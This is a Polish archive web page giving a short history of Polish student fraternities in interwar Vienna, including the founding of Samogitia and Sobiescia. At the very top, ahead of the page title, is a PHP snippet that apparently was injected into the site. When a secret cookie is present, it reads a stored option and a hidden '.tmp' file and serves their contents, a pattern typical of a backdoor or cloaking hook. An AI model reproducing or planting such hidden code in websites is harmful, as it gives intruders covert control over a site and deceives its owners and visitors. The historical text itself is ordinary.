if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Wiedeń

Po zakończeniu pierwszej wojny światowej, jakkolwiek Wiedeń przestał być jedną z wiodących politycznie stolic europejskich, pozostał znaczącym ośrodkiem akademickim. W Wiedniu funkcjonowało kilkanaście szkół wyższych. Wśród nich najważniejszą pozycję po-siadał założony w 1365 r. przez Księcia Rudolfa IV Uniwersytet Wiedeński (Alma Mater Rudolphina Vindobonensis), który mógł się poszczycić się wieloma wybitnymi postaciami świata nauki, w tym licznymi noblistami.

Wiedeń był miastem korporacyjnym par excellence. W latach między pierwszą a drugą wojną światową funkcjonowało tam kilkadziesiąt korporacji studenckich, co czyniło Wiedeń jednym z najsilniejszych ośrodków korporacyjnych w Europie. Ich pozycja społeczna była bardzo wysoka. Warto wspomnieć, że prawie wszyscy kanclerze austriaccy okresu międzywojennego byli członkami katolickich korporacji. W Wiedniu oprócz korporacji austriackich w latach międzywojennych funkcjonowały także korporacje mniejszości narodowych, w szczególności żydowskie i polskie.

Wyższa Szkoła Handlu Zagranicznego (Hochschule für Welthandel), Wiedeń druga poł. lat 30-tych.

Przed pierwszą wojną światową społeczność polska liczyła ok. 50 tysięcy osób, jednak uległa znacznemu zmniejszeniu po odzyskaniu przez Polskę niepodległości. Także liczba studentów narodowości polskiej studiujących w Wiedniu zmalała w porównaniu do okresu przez I wojną światową. Polscy akademicy tworzyli jednak także w latach międzywojennych zwartą społeczność. Po przeniesieniu przez powstałą w Wiedniu w 1910 r. Jagiellonię siedziby do Warszawy w pierwszych latach międzywojennych nie funkcjonowała tam żadna polska korporacja. Decyzję o powołaniu takiej organizacji podjęto dopiero w 1926 r., kiedy to grono studentów tworzących Koło Kownian podjęło decyzję o utworzeniu Samogitii – korporacji studentów pochodzących z Litwy Kowieńskiej. Kilka lat później w 1929 r. z inicjatywy członka Korporacji Lechia z Poznania dra Tadeusza Lisieckiego powstała także Korporacja Sobiescia, której znaczna część członków studiowała na Wyższej Szkole Handlu Zagranicznego (Hochschule für Welthandel).

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 28 VII 2010 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polskie korporacje akademickie w Wiedniu, (na:) www.archiwumkorporacyjne.pl, stan 28 VII 2010 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }